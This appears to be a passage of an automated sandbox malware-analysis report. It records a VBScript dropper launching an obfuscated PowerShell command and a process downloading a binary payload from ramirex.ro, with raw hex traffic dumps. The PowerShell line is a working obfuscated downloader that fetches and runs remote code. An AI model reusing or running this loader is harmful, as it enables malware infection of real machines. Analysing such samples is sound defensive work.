                                                2024-06-01 17:57:42 UTC16384INData Raw: 6f 52 31 6a 71 61 44 63 64 6d 55 56 6e 6d 4c 6b 6f 43 5a 30 53 51 6b 6b 75 6d 46 69 6e 4f 5a 6e 6f 52 31 6a 30 51 77 73 46 61 64 66 6b 4f 44 6c 6f 42 30 57 45 79 46 67 48 38 61 59 48 57 50 72 4c 34 57 33 47 31 39 65 35 77 46 6e 48 69 4a 6e 68 37 77 46 33 58 69 63 55 4e 61 73 6d 75 70 67 54 5a 78 67 48 77 35 6d 70 32 42 67 6e 45 6a 48 77 30 4f 43 49 79 58 69 59 75 53 67 4f 41 2b 75 66 35 69 69 5a 52 58 69 59 75 53 67 4a 54 4b 35 4f 35 6d 68 5a 52 58 69 59 75 53 67 53 48 44 4f 4f 35 7a 57 47 36 45 64 59 36 2b 4f 49 4c 79 43 49 65 51 76 6f 73 59 6b 73 71 64 66 6b 4a 7a 6c 6f 42 30 57 45 4f 4e 37 35 69 52 6e 48 6d 35 42 54 39 63 46 45 32 46 51 2f 6d 57 54 61 55 34 32 57 43 57 67 5a 5a 50 53 37 73 47 34 6e 46 43 38 57 32 76 4e 59 48 75 63 6f 45 51 34 47 57 74
                                                Data Ascii: oR1jqaDcdmUVnmLkoCZ0SQkkumFinOZnoR1j0QwsFadfkODloB0WEyFgH8aYHWPrL4W3G19e5wFnHiJnh7wF3XicUNasmupgTZxgHw5mp2BgnEjHw0OCIyXiYuSgOA+uf5iiZRXiYuSgJTK5O5mhZRXiYuSgSHDOO5zWG6EdY6+OILyCIeQvosYksqdfkJzloB0WEON75iRnHm5BT9cFE2FQ/mWTaU42WCWgZZPS7sG4nFC8W2vNYHucoEQ4GWt
                                                2024-06-01 17:57:43 UTC16384INData Raw: 77 4a 79 51 77 46 6a 4b 33 42 4a 6a 69 4f 49 58 34 47 65 76 4d 69 48 32 4b 65 4f 62 6b 6d 49 2b 4b 34 44 64 35 61 41 64 35 77 46 6e 48 2f 58 63 65 75 50 69 31 6f 79 67 54 4a 67 6b 31 2b 4c 57 51 6c 79 64 65 53 45 76 6a 6d 59 4a 6c 2b 70 5a 55 42 78 6a 35 43 44 68 51 46 73 38 36 41 36 62 6d 4d 66 69 45 7a 58 61 4f 58 38 6b 33 75 49 54 6a 56 63 37 42 79 48 61 67 32 4d 77 35 57 49 65 4b 36 43 54 35 61 41 64 35 78 4a 6e 48 35 34 77 75 4f 54 6a 48 2f 31 37 57 6a 63 68 4c 79 7a 5a 36 7a 50 69 35 69 39 48 64 67 38 68 4c 38 6f 46 4c 6c 31 62 4a 32 65 59 65 75 61 67 48 57 59 72 72 55 72 6d 50 79 47 6f 65 75 61 67 48 5a 6a 43 71 38 76 69 55 62 6b 66 59 2b 51 45 70 7a 46 67 78 70 69 77 5a 51 30 45 59 65 53 67 53 6a 43 77 70 5a 77 65 6c 41 71 34 59 2b 53 76 6b 4c 69
                                                Data Ascii: wJyQwFjK3BJjiOIX4GevMiH2KeObkmI+K4Dd5aAd5wFnH/XceuPi1oygTJgk1+LWQlydeSEvjmYJl+pZUBxj5CDhQFs86A6bmMfiEzXaOX8k3uITjVc7ByHag2Mw5WIeK6CT5aAd5xJnH54wuOTjH/17WjchLyzZ6zPi5i9Hdg8hL8oFLl1bJ2eYeuagHWYrrUrmPyGoeuagHZjCq8viUbkfY+QEpzFgxpiwZQ0EYeSgSjCwpZwelAq4Y+SvkLi
                                                2024-06-01 17:57:43 UTC16384INData Raw: 30 32 6b 7a 53 63 4f 68 71 54 49 69 76 4c 44 69 48 44 42 48 54 30 67 53 56 2b 65 67 30 56 4f 44 6f 37 58 48 64 31 71 32 41 2f 73 6f 6c 48 36 4d 4d 74 4a 75 71 72 34 58 64 6e 6c 44 34 4d 7a 44 69 35 74 6c 42 74 53 55 35 6f 53 69 48 57 4e 63 77 71 32 79 41 57 77 52 54 58 61 4c 56 32 6d 36 44 68 44 58 61 7a 69 4f 57 64 41 38 69 39 42 30 47 74 6a 31 6f 48 56 49 4f 41 36 44 49 50 30 43 49 2b 4e 45 79 54 41 6f 4a 59 49 37 6b 7a 56 61 37 42 6c 45 72 53 48 62 4f 4a 73 36 42 2b 49 53 59 63 49 4a 32 43 48 7a 38 72 77 4c 51 75 72 53 6a 66 2f 77 4f 6f 57 38 39 67 4f 38 79 55 76 4f 44 5a 53 43 70 76 6c 69 54 48 30 52 41 4e 56 61 72 63 65 59 75 50 34 59 77 56 69 6b 72 6d 62 65 7a 61 32 43 33 53 56 39 59 65 53 67 6c 75 61 45 6f 68 31 6a 36 79 58 48 6d 42 74 66 6c 75 7a
                                                Data Ascii: 02kzScOhqTIivLDiHDBHT0gSV+eg0VODo7XHd1q2A/solH6MMtJuqr4XdnlD4MzDi5tlBtSU5oSiHWNcwq2yAWwRTXaLV2m6DhDXaziOWdA8i9B0Gtj1oHVIOA6DIP0CI+NEyTAoJYI7kzVa7BlErSHbOJs6B+ISYcIJ2CHz8rwLQurSjf/wOoW89gO8yUvODZSCpvliTH0RANVarceYuP4YwVikrmbeza2C3SV9YeSgluaEoh1j6yXHmBtfluz
                                                2024-06-01 17:57:43 UTC16384INData Raw: 45 66 51 36 67 70 6e 56 49 68 73 74 34 47 4c 6b 6f 47 69 55 70 53 54 55 70 4f 57 51 30 71 2f 52 78 70 69 6a 5a 5a 47 6b 4e 7a 76 74 6d 62 74 6c 6b 53 7a 4c 32 4f 57 63 55 73 4d 41 79 67 77 53 59 55 45 46 33 57 71 55 2f 6f 61 69 48 57 4e 66 74 43 76 54 4d 53 48 75 75 64 39 44 6f 6c 73 51 49 65 35 59 73 69 31 32 35 78 67 68 39 70 4b 2f 66 68 7a 6e 41 4a 6a 70 59 6a 30 72 67 41 48 6d 6f 42 31 62 50 5a 6a 66 70 4f 57 47 51 4f 49 51 78 69 53 37 5a 59 6d 57 6e 69 65 69 36 36 65 74 49 53 79 62 65 59 46 49 57 7a 51 68 4c 50 48 76 43 57 43 6b 59 56 63 63 59 2b 51 47 58 48 31 31 49 65 59 4f 35 59 74 4b 34 70 6e 55 36 6e 6e 6b 6f 42 4c 73 68 2f 66 69 6e 47 55 56 36 6d 4c 6b 6f 43 36 6a 41 30 57 63 7a 68 4f 68 48 57 4f 6c 45 37 39 65 5a 52 32 78 59 2b 53 67 38 47 50
                                                Data Ascii: EfQ6gpnVIhst4GLkoGiUpSTUpOWQ0q/RxpijZZGkNzvtmbtlkSzL2OWcUsMAygwSYUEF3WqU/oaiHWNftCvTMSHuud9DolsQIe5Ysi125xgh9pK/fhznAJjpYj0rgAHmoB1bPZjfpOWGQOIQxiS7ZYmWniei66etISybeYFIWzQhLPHvCWCkYVccY+QGXH11IeYO5YtK4pnU6nnkoBLsh/finGUV6mLkoC6jA0WczhOhHWOlE79eZR2xY+Sg8GP
                                                2024-06-01 17:57:43 UTC16384INData Raw: 5a 68 75 59 41 45 36 55 62 62 72 6a 4a 47 32 6e 47 72 78 65 4e 70 59 66 6a 68 74 36 48 64 74 49 62 5a 73 78 48 55 58 74 6a 55 42 64 71 49 74 74 58 6e 74 6a 55 4a 79 54 61 48 46 55 33 6c 57 36 38 36 59 66 58 53 68 55 34 68 66 45 49 62 6c 38 49 64 37 65 6d 6e 77 34 34 69 65 4c 34 4c 50 73 38 49 48 71 42 4b 45 46 2f 6f 49 6c 31 52 50 75 4c 75 54 48 78 35 55 39 38 6a 61 55 65 35 6b 33 4c 49 4c 76 59 76 44 67 48 45 76 70 72 4f 68 72 49 57 41 66 58 4d 6b 64 59 2b 73 6b 53 58 63 62 58 30 55 46 59 57 42 47 34 41 75 41 6c 50 34 6f 6f 52 31 6a 4b 4d 73 48 74 72 7a 33 38 2f 70 45 2b 75 66 53 56 74 39 6d 43 37 69 4a 4a 49 59 73 38 32 6d 32 37 79 53 73 34 61 67 55 53 69 71 51 50 75 4f 75 37 38 41 63 61 57 63 55 51 65 6f 66 38 39 45 77 39 67 34 30 6a 45 62 68 69 4a 6b
                                                Data Ascii: ZhuYAE6UbbrjJG2nGrxeNpYfjht6HdtIbZsxHUXtjUBdqIttXntjUJyTaHFU3lW686YfXShU4hfEIbl8Id7emnw44ieL4LPs8IHqBKEF/oIl1RPuLuTHx5U98jaUe5k3LILvYvDgHEvprOhrIWAfXMkdY+skSXcbX0UFYWBG4AuAlP4ooR1jKMsHtrz38/pE+ufSVt9mC7iJJIYs82m27ySs4agUSiqQPuOu78AcaWcUQeof89Ew9g40jEbhiJk
                                                2024-06-01 17:57:43 UTC16384INData Raw: 7a 71 57 79 2f 51 34 2b 4d 6c 30 71 33 43 6d 69 49 65 7a 31 4c 71 46 32 34 67 32 79 6f 4a 4c 45 49 65 79 6e 46 2f 6b 52 36 76 32 72 63 2b 46 79 59 71 76 4e 75 62 6f 41 67 71 52 49 49 32 47 54 63 4e 52 51 45 51 63 77 68 6e 49 77 55 74 55 68 6f 36 6f 58 71 4b 70 79 66 4c 33 49 62 4a 51 52 37 68 4a 69 38 49 51 64 59 2b 53 67 76 4e 68 4e 71 52 73 63 72 63 2b 42 49 63 58 55 41 5a 37 39 6d 56 34 79 55 57 61 65 45 6c 42 63 34 35 34 65 2b 77 42 70 44 59 49 55 4b 57 57 6b 4f 62 77 48 65 2b 62 69 30 49 52 53 6f 41 38 44 53 39 32 53 31 43 49 43 5a 56 5a 79 2f 49 77 74 6e 4a 56 6d 63 35 79 6d 5a 57 5a 49 4f 38 35 32 6c 47 33 73 66 62 78 67 6b 42 79 69 6e 72 6d 48 75 43 59 33 65 4b 6a 4d 6d 66 35 30 2f 67 4f 7a 47 44 43 30 46 6e 56 38 4a 37 31 5a 6b 56 59 73 76 72 42
                                                Data Ascii: zqWy/Q4+Ml0q3CmiIez1LqF24g2yoJLEIeynF/kR6v2rc+FyYqvNuboAgqRII2GTcNRQEQcwhnIwUtUho6oXqKpyfL3IbJQR7hJi8IQdY+SgvNhNqRscrc+BIcXUAZ79mV4yUWaeElBc454e+wBpDYIUKWWkObwHe+bi0IRSoA8DS92S1CICZVZy/IwtnJVmc5ymZWZIO852lG3sfbxgkByinrmHuCY3eKjMmf50/gOzGDC0FnV8J71ZkVYsvrB


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749707188.215.50.154437992C:\Program Files (x86)\Windows Mail\wab.exe
                                                TimestampBytes transferredDirectionData
                                                2024-06-01 17:58:17 UTC179OUTGET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: ramirex.ro
                                                Cache-Control: no-cache
                                                2024-06-01 17:58:18 UTC356INHTTP/1.1 200 OK
                                                Date: Sat, 01 Jun 2024 17:58:18 GMT
                                                Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                                                Last-Modified: Sun, 26 May 2024 15:08:50 GMT
                                                ETag: "266009d-41e40-6195cc739c2e3"
                                                Accept-Ranges: bytes
                                                Content-Length: 269888
                                                Connection: close
                                                Content-Type: application/octet-stream
                                                2024-06-01 17:58:18 UTC16384INData Raw: d3 e4 33 04 22 db ea f4 63 06 a8 76 1e a7 3a 8b 71 b0 be b1 c2 b6 21 14 45 87 5e ed 8f a5 b5 8d 84 59 79 09 67 82 8a 89 a7 ac 15 7a 11 c7 2a 02 3a 3f 46 03 3a 54 3f a6 29 41 c1 24 d5 75 6b 7c 78 23 d3 01 7d 55 c1 3c 77 90 cb f2 cb 87 5b fd b9 c7 2a 73 0c ee 49 cc 24 d6 25 0a 12 8c b0 07 34 70 b8 50 0d 9d 4a 63 6e da cc a3 09 8f 7f f1 a3 47 61 1e 5e 3e cb 01 c0 0d e8 a6 23 a1 d2 42 7c 3f 29 4e 5f 3c 64 9b c1 80 e5 13 26 74 76 d1 fa e6 c9 cf af 0c 33 43 d9 af 51 2b 17 e0 72 92 29 3e db 22 6e 96 7f a2 54 20 18 89 e4 46 34 d3 84 53 f8 50 67 79 72 6c b5 34 76 fd 76 a2 82 ca 1d a8 67 e6 94 1d 1d b9 16 1c 45 c1 c0 ee 7e 83 d5 bf d6 be ae dd cc b9 b1 db 68 3e 2c b3 e2 19 f3 b2 75 40 ea d7 62 8c 06 28 d7 f2 a0 33 03 a4 43 8e 03 8f 6a ec 66 02 d7 43 15 d8 47 f7 dc
                                                Data Ascii: 3"cv:q!E^Yygz*:?F:T?)A$uk|x#}U<w[*sI$%4pPJcnGa^>#B|?)N_<d&tv3CQ+r)>"nT F4SPgyrl4vvgE~h>,u@b(3CjfCG
                                                2024-06-01 17:58:18 UTC16384INData Raw: 83 52 5d e1 29 44 82 a2 a3 69 b1 4e 59 c9 05 7e f1 83 8d 38 8a 36 0f 32 21 23 ab da 0a ec 83 2e 90 ee bc c4 33 75 04 f3 f1 1b fd 0b fa 69 c9 96 4f a2 4b 91 23 0a eb 99 d2 a4 b2 fd 2e dc 79 45 cb e1 27 74 af a4 58 d0 75 e0 70 3b 16 76 f5 bc db ed fe 44 1d f9 f1 8d c5 bb 61 da 3b fa 51 0f ce 74 05 7a bb 4c 8a 5e e3 2c 50 6b 46 e3 3b b3 ab 31 07 4c 78 1b bc d9 c0 b0 9f 0a 9b a4 68 ac 7c 91 38 8f 26 a0 8b bf 77 eb 42 47 8a 63 80 77 f4 89 83 66 3f d5 74 6f 1c 67 2b cf 52 0b 88 91 b9 ea bf 09 09 56 4c 80 0b f7 40 43 05 6b b3 14 89 bb 03 32 8e 38 84 bc 5a e0 9f 02 3e 2a 31 78 4b 0d 78 33 ac e9 6d 89 af a6 0f 59 6d 07 8e 03 7b 60 f0 27 84 74 71 40 e2 e0 0b 7d 13 c8 db c5 e5 53 45 01 55 94 14 1d aa 2d f2 e7 a3 f7 92 3b 63 ad 8d 52 fa 64 fe 42 87 98 d5 90 fb a1 8e
                                                Data Ascii: R])DiNY~862!#.3uiOK#.yE'tXup;vDa;QtzL^,PkF;1Lxh|8&wBGcwf?tog+RVL@Ck28Z>*1xKx3mYm{`'tq@}SEU-;cRdB
                                                2024-06-01 17:58:18 UTC16384INData Raw: ea 7e 17 74 08 f0 df 16 67 56 25 5a c4 b5 5d d3 03 c9 b8 69 e5 76 f4 51 86 1b 3d 36 b2 49 ef 77 12 77 33 3f 02 36 74 7d 43 3a 3c 0c d9 70 27 b9 ef 28 59 3a e2 7e 4a 55 80 c1 d2 ff 85 10 3a 07 a8 cc d8 2c ce 22 af 86 e9 b0 7d 68 9a 92 f5 89 98 90 81 46 0e 28 51 c9 aa ad 16 63 8b 42 06 bc 02 c5 1e a1 6a 9f 91 de 58 26 e6 08 f4 ed 3c 7d 8c 93 08 46 f5 3d 7b 92 67 31 b8 9f 4a 34 2a 46 5c 06 56 e5 21 6f af f3 1e 36 33 6c d0 b7 56 9c 0a 87 b5 5c 39 9d ee 29 95 23 d0 07 b2 b0 b8 a5 46 79 6a 7d 6e fd 7a c7 be 6a f5 59 dc 2d 85 e4 7d 48 67 11 b0 1f c8 16 fa fb 07 ec 6a f7 75 60 6d 5c cf 70 43 8b 6b 4c 1d 4b ba aa e5 fb 52 89 0f ab 5b 76 73 1f 0f 11 8a 2b d7 a4 1f f7 96 2c 1a 44 d7 a8 2a 05 72 9e 03 98 db f2 57 4e 6e d9 cf 4a 82 75 66 09 03 cb ee 14 42 f4 1a 76 c7
                                                Data Ascii: ~tgV%Z]ivQ=6Iww3?6t}C:<p'(Y:~JU:,"}hF(QcBjX&<}F={g1J4*F\V!o63lV\9)#Fyj}nzjY-}Hgju`m\pCkLKR[vs+,D*rWNnJufBv
                                                2024-06-01 17:58:18 UTC16384INData Raw: a3 e0 d2 9a 68 40 93 c3 da 2a 13 0c 57 a9 cf 85 8a 14 09 bf 68 9f 98 ce 28 f5 f7 ed b1 43 da 6c 05 1b 21 69 02 7e ed 9d 0f fd 22 ae 71 b9 96 0a 0c ce d0 92 54 60 07 0a 35 36 c4 18 0e bc 5f f0 74 c3 95 a5 2d ab 3f 2c d7 62 db 2c 84 43 9b dd 8b 9c cd d8 5e 08 51 66 40 7a 26 b6 81 5f 70 fa 18 70 7a 4a ee d3 54 3e cd e2 cf 30 26 7e 2a df b5 d7 50 1d c5 c1 fc 40 24 a7 23 dc 30 95 fc fe 0b 27 8b aa a7 9c 37 33 13 a2 53 37 68 ab ca 20 87 67 a8 1d 95 ce 2e be 4e 78 20 d3 3d d1 38 93 a1 9e a2 f3 61 8d a6 3e 15 4e 13 ca 7f 59 84 38 84 da c8 01 93 48 3e 83 d5 f5 64 80 35 82 48 9b d1 31 2f f3 f8 be 75 7d a6 dd ab b8 5d 9f 7b c9 f6 92 cc 54 f2 dd 6b d5 6e 70 7a 3a ea 6c bf 48 a0 ea d9 ef dc 0b 73 4b eb b3 3e a4 d6 24 ee 62 a7 c5 69 36 58 44 39 ff ca f3 39 33 a3 bc c5
                                                Data Ascii: h@*Wh(Cl!i~"qT`56_t-?,b,C^Qf@z&_ppzJT>0&~*P@$#0'73S7h g.Nx =8a>NY8H>d5H1/u}]{Tknpz:lHsK>$bi6XD993
                                                2024-06-01 17:58:18 UTC16384INData Raw: 4f 89 d4 f3 03 bd 1f 12 09 05 81 08 fb 9c 4b a5 c7 c0 24 29 75 05 75 8f 4f db fb 03 1e bd 28 1e 32 f3 07 c0 cb ca 9d e8 7f 43 1f 48 11 1e 67 1b 00 00 3b e3 62 50 27 0c 3d a7 7c bc 3e 8a 3d be 16 f3 a3 19 0b e3 58 e0 c7 99 6f 5a 34 6a c0 0e e3 e4 95 66 8e e4 6b 5e 9f 5f d1 0a 93 c9 6f 88 18 22 7f 39 24 64 91 d5 5f 08 50 0b 01 e4 70 da 80 d1 27 e2 2c 17 8f d9 9a 50 ea 9a ef dc 72 53 97 8f 92 c5 07 d5 71 39 0b c5 60 91 20 c5 d3 d9 4a cb 4c 91 07 42 85 0a 6c 95 c9 4c ec f7 07 6c 60 d9 67 53 67 4a 7a 5c 8f ed 9c ed a7 89 cc 78 d4 d1 06 82 c5 7f 44 8f 5f 89 b4 6f 60 d8 d1 26 cb 0f f4 2a 85 ae 94 68 99 9a e7 f0 84 a2 b3 81 fc ac a5 01 a4 d6 30 e9 d3 c5 70 e2 2a 15 e9 96 9b f3 bd 0b ad 0c 14 b9 f5 e3 eb 77 d3 8f d3 6b c6 96 c8 e9 0f 6f 21 09 d8 35 69 3f a8 bc f4
                                                Data Ascii: OK$)uuO(2CHg;bP'=|>=XoZ4jfk^_o"9$d_Pp',PrSq9` JLBlLl`gSgJz\xD_o`&*h0p*wko!5i?
                                                2024-06-01 17:58:18 UTC16384INData Raw: 69 32 6f e9 22 5d 04 d0 64 f8 38 7c 30 77 fe 0f a8 2e 5a 04 99 05 f1 06 55 cf eb 40 6f d5 41 b5 9b 60 a2 7d 0f 79 ad 42 7d 9f 84 37 4a 5a af cb f4 dc 76 fc 64 23 97 cc 8d d3 e3 5d 35 4f 2c b2 dd 85 a0 53 f3 35 c4 ab 3d ca 79 8c 1e ed a9 07 51 20 c0 c2 83 ee 39 6c 90 b8 e0 94 b3 95 32 72 88 77 26 af 5f e6 94 a1 c0 5a 7d 8b 73 1e af 01 e7 a5 eb 29 5b 3e bc c9 9b 1e 62 3e ad 27 8b 7a f2 d3 48 fd f6 87 bb dc d8 73 86 59 b1 69 b0 26 37 be e7 6d e9 ae 58 7b d1 aa 9e 71 00 d7 7c 19 69 c8 15 4b 03 6e ab df 54 b7 4a 3f 95 cf 03 53 2c a0 59 52 63 d1 82 f8 66 c5 2c c1 1c b7 af e6 6c 4e e5 9f 04 11 8e 3a 48 41 6a e3 77 c5 9e 2c 28 a6 39 24 46 3e 07 5b ad 11 5d cd d4 33 b2 3d 0c e1 42 6b 34 fe 87 81 ea f8 64 e8 e5 cb 53 38 0d 07 f1 b5 1e 1e c1 fa 35 c9 0c 8f 23 7d a5
                                                Data Ascii: i2o"]d8|0w.ZU@oA`}yB}7JZvd#]5O,S5=yQ 9l2rw&_Z}s)[>b>'zHsYi&7mX{q|iKnTJ?S,YRcf,lN:HAjw,(9$F>[]3=Bk4dS85#}
                                                2024-06-01 17:58:18 UTC16384INData Raw: 18 76 4c 21 26 b5 eb 68 e5 db b3 0b 5f 8b 8c d4 ef a5 8a 3d d0 68 ae 7d 9c 16 7b 06 f2 74 b2 9c bb 4b 1d 15 54 3f 8b 86 de c1 d3 dd e8 76 aa b7 dd c8 2b 4a 57 4c 3a 1b 09 36 f6 69 bf 15 96 25 32 87 9f 8c 77 ae 97 de 95 2a f0 9a a6 f7 9a 1f 6e c9 ef fa 75 c5 4d 54 2b e6 4b 4e 2d 5d c3 f1 d5 cb c4 7a 6f fb d6 7a 97 4e 50 fa d9 37 df 97 33 5f 6d b1 a8 0c 29 7f 24 07 72 5a 3f be 45 27 c8 b9 22 e7 02 d3 7b 50 5f e6 fd b9 03 44 d7 9c f8 37 03 e0 c2 8b ab ae c3 99 24 7a d7 f0 8e 14 69 85 11 00 e8 26 62 45 e0 cd 42 a4 c1 7b 54 41 34 99 b1 92 18 1e a6 2a 14 fa aa 0a 27 bd a6 bd 4c 1b a7 57 37 0c 1c 01 ec 30 97 9d 99 9b f3 24 b0 4e a8 a1 f6 95 e5 c3 5e e4 64 d4 1f 7f 87 a9 a0 9d 69 82 f6 3c d5 19 46 c3 da 7d e0 87 99 2a 4d 17 7e a1 da 86 dd ec 05 22 06 8f 49 7c a2
                                                Data Ascii: vL!&h_=h}{tKT?v+JWL:6i%2w*nuMT+KN-]zozNP73_m)$rZ?E'"{P_D7$zi&bEB{TA4*'LW70$N^di<F}*M~"I|
                                                2024-06-01 17:58:18 UTC16384INData Raw: 76 62 56 00 e3 cc 13 54 da 27 96 7e 54 ab 44 83 57 ce ba b3 14 54 f6 0a cb dc c1 39 7f c6 b7 a2 6b af ed aa ac 9c 72 1b 71 7b 2a c8 04 78 ec 5d e3 66 ba 46 b6 56 e2 e3 77 9b ab d3 b3 62 ad 6d c5 06 19 5d d8 9d 19 03 9c d6 88 53 af d4 5a 8b ec b4 31 c7 2a a6 2e 6f 9f d9 5d 34 6f 6d 26 ce f8 ff 8a 04 56 9b a5 13 64 7d 67 65 e6 2f 0a 02 8d 6e 53 51 c7 b7 56 72 d3 6d 80 ee 37 2a 7f 50 33 e7 1c 89 36 d3 9f 1e c2 82 ff e2 ad 27 61 6f 93 f7 fe ea 41 16 da 31 12 62 21 ee 79 ba de cb 78 99 93 88 41 73 21 aa 5c 31 ec f8 20 44 fc bf 7f ab dd 83 2e 84 44 4f c7 78 86 ff a9 23 a1 61 fa 32 f6 13 65 b8 e9 1f b2 b9 a9 48 c6 95 3b 3f 09 1c ae 36 8d 99 23 b3 0d 2d ef 0b 50 56 47 66 a5 aa a0 e7 d3 1c 8a a2 53 4b 58 a9 0c b6 99 35 70 b4 26 19 24 5e be 67 14 40 5b 34 b0 5b 74
                                                Data Ascii: vbVT'~TDWT9krq{*x]fFVwbm]SZ1*.o]4om&Vd}ge/nSQVrm7*P36'aoA1b!yxAs!\1 D.DOx#a2eH;?6#-PVGfSKX5p&$^g@[4[t
                                                2024-06-01 17:58:18 UTC16384INData Raw: 88 54 8f 92 a7 0c 3b cf 6b 4e 06 22 c3 47 cb 00 38 4c a1 83 89 57 aa ab 74 e5 9c 40 52 ad dd 78 47 18 12 1d dd 0a 77 4b 44 5a d4 d7 06 58 88 db 70 03 04 d2 47 9d 81 49 35 e5 68 73 e9 83 e6 91 dc ba 22 23 b3 2a cb ed 10 a3 db 06 7c 00 a7 d4 9f 6a 1d 70 d5 6e 00 1b 15 54 8a 65 b5 a4 67 1b 1c 16 57 71 06 f2 ba 55 e4 5d ea 6b dd 2b 57 df aa 9f e4 d6 ff d6 fa 9f 04 35 2e e9 3d bf 99 ff 08 56 7b d5 f4 ed ec e8 ce 5d 8f cf 63 1e fa 7b fc 7f da c3 d0 76 e0 51 51 bc df fe 20 0b 1f 5d e5 07 9c 2c be 32 3c d7 86 24 a2 1a b2 b4 d9 45 79 8d f8 55 76 0a 2f e9 61 e1 4a 19 d9 1a 87 fc 2c 9c dd c6 e2 47 84 43 1c 95 3d 43 ea 7b b3 27 16 7d 16 8d 19 be 51 f9 4c 7a 3b 8e d0 44 ae 85 67 53 96 85 50 fe ed fd ba 56 df 67 43 97 9f 5a d3 21 4a 71 ac 89 4c 02 f5 96 08 65 fb 2a 54
                                                Data Ascii: T;kN"G8LWt@RxGwKDZXpGI5hs"#*|jpnTegWqU]k+W5.=V{]c{vQQ ],2<$EyUv/aJ,GC=C{'}QLz;DgSPVgCZ!JqLe*T
                                                2024-06-01 17:58:18 UTC16384INData Raw: 9d f4 63 45 38 78 ba 29 cd b5 4a f9 10 7b 53 f1 74 39 1d 79 ff 62 95 49 42 53 26 e9 22 07 32 54 f5 75 f5 96 82 81 b1 85 aa 8c 89 a4 4e 78 24 2d 5f b1 df 00 95 39 0f c6 ba ac 5f 03 c7 31 65 5d 4a ec c2 ca 7b 7a 8e 9e 8e d6 71 eb c3 85 ff da a1 c6 81 66 5a 25 c5 1c 63 02 48 4d ed 8e 33 52 59 e0 06 b4 59 b2 b7 bd 29 37 6f bf 6e 24 b3 9f 85 21 bd 84 c1 14 ee cc a6 fb 20 ac 8e 78 60 48 1f c5 02 ad 00 10 25 ac 53 f1 47 46 76 cf 3b cb 1c f6 70 81 90 27 36 8a 55 16 2b 81 06 8f 06 da 44 56 0e 78 0a 78 66 dd c5 fd f3 a5 b6 6c e1 9b db 6d d0 85 48 33 f6 f3 62 92 79 ba b3 8c 1d 9c f8 1b ca 6d 89 78 9b 51 9f fd e2 4f 01 36 ea 03 f4 11 37 f9 42 1f 16 cb 8d 6c 92 64 da 71 4b ec cb 4e 75 4f 7c 1d 68 10 5f d7 2c 81 0c d9 37 f0 0b 25 33 85 e3 cd fe 8b bb f6 59 bd 33 7c 68
                                                Data Ascii: cE8x)J{St9ybIBS&"2TuNx$-_9_1e]J{zqfZ%cHM3RYY)7on$! x`H%SGFv;p'6U+DVxxflmH3bymxQO67BldqKNuO|h_,7%3Y3|h


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:13:57:37
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"
                                                Imagebase:0x7ff6abcf0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:13:57:37
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG 